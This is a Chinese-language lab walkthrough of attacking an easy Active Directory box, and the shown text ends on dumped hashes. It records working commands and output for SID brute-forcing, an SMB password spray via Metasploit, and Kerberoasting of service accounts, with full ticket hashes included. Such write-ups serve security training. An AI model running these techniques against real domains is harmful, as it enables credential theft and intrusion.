难度:easy
kali:192.168.56.104
靶机:192.168.56.128
> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:3b:0f:e6 PCS Systemtechnik GmbH
192.168.56.128 08:00:27:68:1c:ef PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.930 seconds (132.64 hosts/sec). 3 responded端口扫描
> nmap -p- -sV -A -sS -T4 192.168.56.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-15 12:24 CST
Nmap scan report for 192.168.56.128
Host is up (0.00020s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-15 19:26:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:68:1C:EF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-15T19:27:14
|_ start_date: N/A
|_clock-skew: 14h59m57s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:68:1c:ef (Oracle VirtualBox virtual NIC)
TRACEROUTE
HOP RTT ADDRESS
1 0.20 ms 192.168.56.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.67 seconds开放了很多端口,还有DNS,LDAP,SMB等服务,先从熟悉的SMB看起
SMB探测
跑一下匿名
> smbmap -H 192.168.56.128 -u anonymous
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.56.128:445 Name: 192.168.56.128 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
有共享目录
> smbclient //192.168.56.128/IPC$
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> IPC$可以看但是空的。IPC$启用共享,可以通过lookupsid.py枚举用户
> lookupsid.py anonymous@192.168.56.128
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 192.168.56.128
[*] StringBinding ncacn_np:192.168.56.128[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
513: SOUPEDECODE\Domain Users (SidTypeGroup)
514: SOUPEDECODE\Domain Guests (SidTypeGroup)
515: SOUPEDECODE\Domain Computers (SidTypeGroup)
516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
518: SOUPEDECODE\Schema Admins (SidTypeGroup)
519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)
520: SOUPEDECODE\Group Policy Creator Owners (SidTypeGroup)
521: SOUPEDECODE\Read-only Domain Controllers (SidTypeGroup)
522: SOUPEDECODE\Cloneable Domain Controllers (SidTypeGroup)
525: SOUPEDECODE\Protected Users (SidTypeGroup)
...
...将用户名生成一个字典
cat users.txt | awk '{print substr($2, 13)}' > username.txt密码爆破一下
msf6 auxiliary(scanner/smb/smb_login) > set USER_FILE username.txt
USER_FILE => username.txt
msf6 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf6 auxiliary(scanner/smb/smb_login) > run
[-] Msf::OptionValidateError One or more options failed to validate: RHOSTS.
msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.56.128
rhost => 192.168.56.128
msf6 auxiliary(scanner/smb/smb_login) > run
[+] 192.168.56.128:445 - 192.168.56.128:445 - Success: '.\ybob317:ybob317'拿到一组账号密码ybob317:ybob317
> smbclient //192.168.56.128/Users -U ybob317
Password for [WORKGROUP\ybob317]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Tue Jun 18 01:24:29 2024
.. DHS 0 Tue Jun 18 01:42:50 2024
Administrator D 0 Sun Jun 16 03:56:40 2024
All Users DHSrn 0 Sat May 8 16:26:16 2021
Default DHR 0 Sun Jun 16 10:51:08 2024
Default User DHSrn 0 Sat May 8 16:26:16 2021
desktop.ini AHS 174 Sat May 8 16:14:03 2021
Public DR 0 Sun Jun 16 01:54:32 2024
ybob317 D 0 Tue Jun 18 01:24:32 2024
12942591 blocks of size 4096. 10795715 blocks available
smb: \> smb: \> ls
. DR 0 Tue Jun 18 01:24:29 2024
.. DHS 0 Tue Jun 18 01:42:50 2024
Administrator D 0 Sun Jun 16 03:56:40 2024
All Users DHSrn 0 Sat May 8 16:26:16 2021
Default DHR 0 Sun Jun 16 10:51:08 2024
Default User DHSrn 0 Sat May 8 16:26:16 2021
desktop.ini AHS 174 Sat May 8 16:14:03 2021
Public DR 0 Sun Jun 16 01:54:32 2024
ybob317 D 0 Tue Jun 18 01:24:32 2024
12942591 blocks of size 4096. 10795715 blocks available
smb: \> cd ybob317
smb: \ybob317\> ls
. D 0 Tue Jun 18 01:24:32 2024
.. DR 0 Tue Jun 18 01:24:29 2024
3D Objects DR 0 Tue Jun 18 01:24:32 2024
AppData DH 0 Tue Jun 18 01:24:30 2024
Application Data DHSrn 0 Tue Jun 18 01:24:30 2024
Contacts DR 0 Tue Jun 18 01:24:32 2024
Cookies DHSrn 0 Tue Jun 18 01:24:30 2024
Desktop DR 0 Tue Jun 18 01:45:32 2024
Documents DR 0 Tue Jun 18 01:24:32 2024
Downloads DR 0 Tue Jun 18 01:24:32 2024
Favorites DR 0 Tue Jun 18 01:24:32 2024
Links DR 0 Tue Jun 18 01:24:32 2024
Local Settings DHSrn 0 Tue Jun 18 01:24:30 2024
Music DR 0 Tue Jun 18 01:24:32 2024
My Documents DHSrn 0 Tue Jun 18 01:24:30 2024
NetHood DHSrn 0 Tue Jun 18 01:24:30 2024
NTUSER.DAT AHn 262144 Tue Jul 16 03:28:25 2024
ntuser.dat.LOG1 AHS 49152 Tue Jun 18 01:24:29 2024
ntuser.dat.LOG2 AHS 0 Tue Jun 18 01:24:29 2024
NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TM.blf AHS 65536 Tue Jun 18 01:24:54 2024
NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Tue Jun 18 01:24:29 2024
NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Tue Jun 18 01:24:29 2024
ntuser.ini AHS 20 Tue Jun 18 01:24:30 2024
Pictures DR 0 Tue Jun 18 01:24:32 2024
Recent DHSrn 0 Tue Jun 18 01:24:30 2024
Saved Games DR 0 Tue Jun 18 01:24:32 2024
Searches DR 0 Tue Jun 18 01:24:32 2024
SendTo DHSrn 0 Tue Jun 18 01:24:30 2024
Start Menu DHSrn 0 Tue Jun 18 01:24:30 2024
Templates DHSrn 0 Tue Jun 18 01:24:30 2024
Videos DR 0 Tue Jun 18 01:24:32 2024
12942591 blocks of size 4096. 10795715 blocks available
smb: \ybob317\> cd Desktop
smb: \ybob317\Desktop\> ls
. DR 0 Tue Jun 18 01:45:32 2024
.. D 0 Tue Jun 18 01:24:32 2024
desktop.ini AHS 282 Tue Jun 18 01:24:32 2024
user.txt A 32 Wed Jun 12 19:54:32 2024
12942591 blocks of size 4096. 10795715 blocks available
smb: \ybob317\Desktop\> get user.txt拿到user flag
LDAP探测
389,636,3268,3269对应LDAP服务,先用ldapsearch扫一下
> ldapsearch -H ldap://192.168.56.128 -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * +
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL
ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=L
OCAL
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
ation,DC=SOUPEDECODE,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 53264
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
dnsHostName: DC01.SOUPEDECODE.LOCAL
defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL
currentTime: 20240715202250.0Z
configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1拿到DNS主机名DC01.SOUPEDECODE.LOCAL以及域名SOUPEDECODE.LOCAL添加到hosts
192.168.56.128 dc01.soupedecode.local soupedecode.localKerberoasting攻击
先请求一下TGS票据
> GetUserSPNs.py -request -dc-ip 192.168.56.128 soupedecode.local/ybob317 -outputfile hashes.kerberoast
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
---------------------- -------------- -------- -------------------------- ---------
FTP/FileServer file_svc 2024-06-18 01:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-18 01:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-18 01:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-18 01:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-18 01:29:18.511871 <never>
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)靶机跟我的kali时间不一致导致的,使用ntpdata同步一下
> ntpdate 192.168.56.128
2024-07-16 05:50:17.021809 (+0800) +53997.567713 +/- 0.000341 192.168.56.128 s1 no-leap
CLOCK: time stepped by 53997.567713
~/Desktop 14h 59m 58s root@kali2 05:50:17
> GetUserSPNs.py -request -dc-ip 192.168.56.128 soupedecode.local/ybob317:ybob317
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
---------------------- -------------- -------- -------------------------- ---------
FTP/FileServer file_svc 2024-06-18 01:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-18 01:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-18 01:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-18 01:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-18 01:29:18.511871 <never>
$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$HTTPS/MonitoringServer*$f02f26591f0aef75426d7752ca0da996$253b76c7d9c7aa4d0047335f7829dbd2ee4511bb0979ff2a3a3d59e2c679a4d6102b7f4527ed52f86f6d67492f0f5209fe311b16735b3e88b5c55f815d78e6898429b9d56203b3e816ef65f941476a921e717ca347542000c0980f3891e16cc2c8b329efe00710d9acdcd34018daab2e079c0552925189dfccd80c525f2ee868ae5b71670da3a2b13a55281bae121099b920e3de3d012e1bc6f11e8fbd36de6ccaeec37d39daa0e3d3fdbaf8dd92ce3a5a602fc8fbeadf2802d8fb9a4939c80b64cd23765a09253496c4443427550befd9fbcf748f5b69aee3aa3c8d3fd5132f35e15b5b03b815f4b8706c46cef736b23ee371210fcf09d1151d1b5dcb025330b74264c536fd4cbb9ff8bd49e06b09a0cdce6dcc31f46098f8d7a4678b022e8568824cbdcd745ec451f27b2f1af069df984c5e1042ea2faed224da1178bbdc1d9b062e7098b63374dfc35b7af725447d740718a60185e916753d00ecec4ce2afc0a114bd3e84832e5a248c313366f0a99d80e7c54f0b89c22ac41bf323ce3adf1d42678a929ba2f7b5d99d391659a07cacf3f9b1b26b203a5d38b71fa019947e7182b6ce230110e0c356615eecafad6aa3a8cb8d4b074516fba865d9d654ad1412737bdef738fc5ddb8e52586e69db00ad4f428f54ed8a22512573be19ae237924127a5a677e74da544df6cb2117a4094edaeaa6c5fdf57fb92b651290614c7b250acc98b3d41e9a1202a55b14a22a013c1b98fdd5e9658820824e34efc96fdcb7e20a30470c7e342666b223b35a07d22c3a3c612b652824f8192b374b710833e4452043e566f361b63d2415ae6b133a50eaf18c7b8edc6be19d96eafcf281f1786b0c1f3a94b4cfbbc37e970d8f129bee6293259870cf0a98cc841c20c4da2662fea46ce37d6efca0f72f5c8dce5c7478b823d31385b932f557cdc467e063420eab0f3618f6aea3cb2b8d045f37742a24dcaebd4dc6aca935f89f144667f7403e40ee2b1a741cf3c7a0e8be8cbcd814b2181576750a5ad93c9aa46e7fde5b01e77a9c6a7fdca5b717d3b9449eab525112882f0bebcf02c0174d32d0923134978532d30257be383f16f86c869fdc6ff8fd85db379c5373ae7667c7d23e973c52d2f3a434fb4f8a2b0ae0eb3c3015391a6e5c7efaf86c906c45c2cb104bdcf886ecfc07b52020b7ac8ea5cb518543002d20319e9560af545b94838fab148eab88d0f567900677e19c2ecd888daa3f625622ff3d76289b5c970995db0223e325643a714ea5970a409d13e01026a457543d91b2ba3db6af1f3861915e71d0c0c9fbb309c71e754377842b8abaa9a65807e0c0fcad5180ff93beb2f9e8691e02ef729bbd5ffb4359731b2c30c58b1b8f2a223e790a5e4796da4ff375cb83390cb8abb55196efc8a144590ec2773da253509ed849acecccdc42cab2065d5f917e7f5548bfa94a3b45951cd12ac8b778e9d258ed9b8fe5a89f9ec916c06065806e8edcf7
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$FTP/FileServer*$2d64339559980b4a517f73b22927e7fc$e957aa7e0636622b658e7c474b61979d6d44a5a27b37f9eecf6e70dd0461108717a9945ba8ddcedbb3cf7a00ba7fa71e9f15c9481c90bad238c6f419e43c2f517bd72acc5570d6b0fa9bddf60cb2c1156b6c1a49ada9ec8042f84f39890a12aded78dda061dd8ec0e592a8a0160d96eae6cf7240fe3e8785cb0fae30d0649eb5f492c67d199d86c3f742f0cc6335837afce19a15c40409cc8cd6ee5833c04f0674c6e3baa6e9b040bf6f38afe65e0d8d32c03493ad1e97f2b801e3ceb61483b6863acfe17c3f6b09a2973b564fcd41a82c88e0b0e37c43e8ef491d4130584db42b41e9604f08259463be8c62bb7e99fa668e511d733c36a78d567c8c67f4b35da6a8f26e870adbc04e36258c28b8fd2e04fbf2753c86bd382d917562b5fcf4afb3569ba9ea76fcea54b993f6accd84a16692e6d08e08f1a252b6ac0eb64eef1a7ae6972af61b9f9c2899acf6704c2fa90593af60352a2e4bf4f5cf12ca7f5e769dec58c91c6fbb5d1dec0d78e0ac3332332d2550717a0512abee6a31a314c1add42835b9798d5c11b728da9b44dd68dc1d40f9237623dca9553ae4fdc7d823e38f0fd4734bb6f344a38c81d841b63071b2127b5dc21f0463d0947f019152502459e73157cd2c1f69e04782ec27934a0c1ca42581c91d778f9e8609e6c18efe5895a430c3b7c3349858cd521b6fb745d1faf1a925b0c1f4d6d9ff66f66546afde1205c3d9a1fd077b3ea5ef21f349f381727d9c35a1302218360ca316350c8afdc3d84ec3ce11f092643ea33f432fb99a4bac3b9544f98e686a3dae22e580c786839f54d165bce1711a933e4c183e3adb54a4f24a14c7abb56c9f8f8e6411603e3e6a3fed6a0506473a69d47f1d17ee05acebb2eadb7dadb56f0e23d7fdb026328a6285f9b7f8c14f55de5d2b5df2e5f4f589a7b7a6dedf50f870d1685a23460dd692bed0dd58cef3f398f70fd052f5e0c8365cea36f12b105ac5dd3a0a055ed1c0c37c1ee60d6bd4c88aad2b62653ce24166bbadb151d20cc638b19fa12016e7c0eab4dc2cb9b3e257b581970c36b8ce9a2b6e80a47bc29a73e6860e04f8788cb4afb801f384b8c8fa65c21d6976417f77e235138d41e88a4093b9d1d8cbe0d3a4898834aeb7f010d3c0b50515582e9a2e5c87af0e4a2925e972a5f75f8e142037fbde86bf8a25f26fbe62b998723a858e38b542e1967ab7ca21a2320b8c1888baf521a9d8809493a19d1d689b0e0280f5e9f369ac0ab61ebbf2aea275bd4a7124079de76efc31591e0083aaf112355d22a8f582e239299de6cbe436f1490e01903e90529df4d93a19ad2442d8052c0d6d320a91c7c0149ba885e4f776a4fa86d13c3638e51bd7f58247214448bbd4bf94a19ceb8f0cf61a2770de8d4cf0c97d1a933513bc41b64fa719fe5f6db70ffd2431c94c8264a0c02fcff40941afe2dd66b6ed31f09a385ae78b23a385b72a3c44cce1b7554b4afa9d250b7a6303623efa
$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$HTTP/BackupServer*$f98fabfb92fcf6aecadefd3b8a4bdc65$046e82f2a4cbc668bcfbd9b6e38751d3f5fd30f158cea68f2f33d8cc139181b7b3324d5ef7ec6d765a5e71d0d2ae679e44c71722d0f6ff64f1143bf34ff6a318de1d619be7e6f64bb145072035965688245d1c047bd31518815a0d6e44834b6afcd0d47e780cba63a0921f92d51e941602c3bbb337d309fe8117d55c87e3b8c48a7394a51f6c91b0d0a8d69628f9ff088f1c81ca70b34466df43702b6599918081470b8e27ca18b246d5f666b844937627f98a0d8a8b69cf029ac6e8bda11ed8185b0e4dea0e767b9a7bb841dfe6219a554183fc411207f5b29e2e7bbf305b25dad6aeee1fdf9cf48fd41b330f0f3443bd7473f01a916258a569b9fe6ee96d337cf40bbfff0539244792edd9166c9184a434831bc2adc897539856d08e314265e02931bf0369199c349ce8a6af417cbe1fd200881e5539ba9c621b6984fc82b941c239e53ba25c07a551766cb76675d8b2d04a969e39bae49d4519b336248d7bf7967e29ab801ba743c3664c261b3014e11dd408094a2705ef0a7d014d4470fa54a5685e02969e2e06af8ad030a39520aa58e54520d979782cdc61e133f175c3fc10ed7d616d3a45f2abf6b4d93db14b5b9433129ba722a488f1a43f583a5570768fc5d8fb14868000ad0e232fbf1156db042dfda291b6f95effa7753176856c65d927a71fc2f6897f57661d2e0ec8c5b97247ec44c2989fdb1a45595ba47cc98f41850bb3663cac4d30bca745d0e37724169043cada53b96c602ae760beb3191b24b2403a812b0ad5cecbe5f6831e1f1bd51f79dc42b1f6405d21533719fe0b4fe75dff16db9a35ff869c99df937e09538a91010201bfd25931c23dab6b619674329df6c37bf400d2f54f2aff13e4f124e5aec5e942aa2e51ec8ca38327c9d138827ba41e5b06a1b2960617e0dcd13b3f1564a66914e15d784c3fa0f0a2be742357ce1e7e9b833f2b03c303e435a54ccfe74940947f14666786c47d53682ca630a4b69a966182cca60ff045f887f94669fbbe97caf6d5790af6f80fc0f3c1cb661b0ae6b6533a5885824c67f609b6e53c5b4e7b8bd0ba8dba9ea1daa3a001fbf8fde441aa1c5d963f77aa1676324729a236c84f960b8d414caddb869aa5822cf24455b061d0cfa8836aa35b4888c1ff57679b7260617e163d092de052e2557c6bfd49ce20e56d6b639097d7c828fc58e322d4f0e46e25d9d466f59520d2d781f1bd2fcd75e5cf6156b885e02acc27eba15d66a534d48bc12343c7b07ccd019b31e41de7d9ca07f90da3e6d5cb15f9e76b706b9dcb602f8aabbfff621fae7ef9e423f9fe14514d4c4eeeb2d73246d7a3aebf795ef45828f7efde263b806d7c5519e665216178d4d79186ccaa91f37268cf624e86104d22e6aa209ed64b763b6e3937343f9893c0bc15bb33ca22ec00837935d33d9cb1b862540a1c7a3bfe0321d851556103e824217b9e7de2a90a21348d2a4193141844fca7e9bfaeeec5477d2e
$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$FW/ProxyServer*$ad4bb3d6193648b48dfe968dfbce59da$a43ff3edc2fa9b462c82fcf119ef0f99242492ebad89c47cda0296c3975fd845f5159cc3485cfeb3796575735d86b1051b6f70f01a169309bec0e3c5844155c795524f7d672e884d69ef0e58ee86e2231575f9556302631ea341c652d77542f5101a2ff87035a0df163586aae6b210f9ac63b004d7ee350c5b63013b28fa48bc7c1f21d827852c2588e33f102a2679777445a31c7d938d4badb3a82afe50c72a86d447062febb58a65fd441e0b1213f1382ac9ff8eded263657a7adc1e54a845ae8b42501fbcc2744b33872b2c835ea50d3f45a18fda498108acc271204ebb3c5eacaa0228538ed9b908d142e6f258aa911c99d5f501d26518095685967e6a11fc4af6e90908b52729731307a7eebc7ac3a5246238d0b7674f3ff71c7a006377ae48d9038d2ad2af1fb6ea35f25c469a27bd02442e80aa4cdc392dd3ec47b1316ce1b15226a726e739138517a263c08ec1a6c84c033347e1e9e3f25682fb81f8a0b5b475b39beb1d4305f4b1b32ab4c6e4e1c6b1ead93a1f25698a35ba8f052bc2edf4a543b715533dd9a09966145a468e35a0f9d9e246c7ecf240106fb7dcc9fba852c6917f729de8231054424e2a0d263713597edebbed59a0bd16f858fc4a082315165bc1ef88126f896e7131476042a3dbf0c2e581dedea536fc042088afbbc1a0bb91c15c9b94380f4157a1ed63d872be6ba45467a68288ceb26824ff09f2d94b521810cdfc3d90e3bfc93c0502143cf8cad74d37fc4431c4484ffc0cb36baf6730cd22bde31e96fc81460291be8dc5d2e989ff51a7b91c25d1945849c984c6daa96bc7fd7b2c5df01e7dbba5097c677dc50b25103ed12cca9bbdf811b2f2ad4681dc583db8cd13a03ef8763c86c581532b5871a150cd52fcf87e0652fa6d2775ff6655e8523c13cff3a65f7ef1bb8b562af71118a5ba8c7ac950ed8bd0b35115c15728ed3b06ff1eb9acef0502b970ae8992ce83cded0b5aecfe61e69fb229d6f6a75d38a8dec0d5688939e5f6885252fb31ca311f6b7be13e613a1dcf8c1c6ee42ccd4b9e6287356fef8164aeb8ff8f3dcb9eed30b376f2c31c3baffebbe726ec750f3f877c39d71c57c0ef8ef84fb6a3bc62f715297430fbb94c587639894e286e555d280bea8cf33e66ef903886d2009f1c6fbab6639a1c2f4a1a5604a050ce578f093ec8f3899d3e5b21de2b10b9001577eda6322c1d8ddf55c1242a765cb6020c5dbee296a23b7422c784f542d2bc917fcfbda4b173af9cf459f8e31114a71c40291e91899f896151a307220f6c4c3abb127107d9bb25c100999802e6e4ff1f4811ad2f613a9a8240de720cd96343212d57101696278bdafa395a0970d68e1ec2f74878a6a18fa78e743fc1e2819e5f564489eb33163b3dc92534f0144d8ee980086f874c120240c4ef95844b6a502235c897940afb323f14817e566c1dae22c08ea6204c6985aa6e80f929ce565b619627c673d1f3d2
